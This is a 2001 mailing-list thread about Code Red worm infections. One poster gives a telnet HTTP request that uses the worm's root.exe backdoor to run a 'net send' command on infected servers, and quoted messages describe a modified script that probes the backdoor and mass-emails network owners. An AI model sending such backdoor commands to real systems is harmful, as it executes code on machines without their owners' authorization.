If you really think that emailing the people who can do something
about it is a waste of time then try what I said to start with -
the idiots running the MicroShaft machines obviously don't have a
clue so emailing them probably wouldn't do much good
(I rang my ISP and they asked me to email the list of IPs
attacking me from their subnet!)
BTW I got the original perl from one of the big sites discussing
what to do - mostly full of dorks saying: oh no you can't touch
someone else's computer (so why should the MS idiots be allowed
to touch my computer and cost me money - a small amount - bandwidth
is very expensive in Australia - $0.15 per Mb or more when you are
talking permanent IP addresses like I have)
Anyway ...
telnet xxx.xxx.xxx.xxx 80
GET /scripts/root.exe?/c+net+send+localhost+\"Your+computer+is+infected+with
+Code+Red+2.+See+www.incidents.org+for+instructions+on+how+to+remove.\"
HTTP/1.0"return""return"
But of course people were even complaining about doing this!
Sigh ...
-Cheers
-Andrew
--
MS ... if only he hadn't been hang gliding!
>
>> From: Chris Kloiber <[EMAIL PROTECTED]>
>
>> What the script is doing is attempting to access the backdoor to the
>> infected box (http://$ipaddr/scripts/root.exe?/c+dir) If it cannot
>> (IE: this was a code red 1 infection?) then it is not sending emails.
>> I took that check out, and it just spams the heck out of the
>> postmaster@<who_owns_that_ip_according_to_arin>. I also took the delay
>> out of the webpage so I could test it faster. It's launching the mail
>> immediately upon attack now.
>>
>> If I don't get my IP pulled (all mails thus far have gone to my ISP)
>> for complaining I'll consider putting up a modified tarball as well.
>
> Dude,
>
> I don't want to spoil the fun, but working for an ISP of sorts, I can
> tell you this is really going to get the good ones pissed at you, and
> the bad ones are just going to bitbucket your mail :o(
>
> The problem is that the data that ARIN/RIPE/etc keep on IP blocks may
> lead to the mailbox of an overworked sysadmin who won't be able to do
> much to help you, and is just as saddened and infuriated by the whole
> problem already.
>
> Now, if we can make the machine send a mail to its owner/administrator
> telling them they're infected ... unfortunately I don't know enough
> Windoze to do much, I'm afraid.
>
>> --
>> Chris Kloiber, RHCE
>> Enterprise Support - Red Hat, Inc.
>
> --
> /* Bill Crawford, Unix Systems Developer, ebOne, formerly GTS Netcom */
> #include "stddiscl.h"
_______________________________________________
Seawolf-list mailing list
[EMAIL PROTECTED]
https://listman.redhat.com/mailman/listinfo/seawolf-list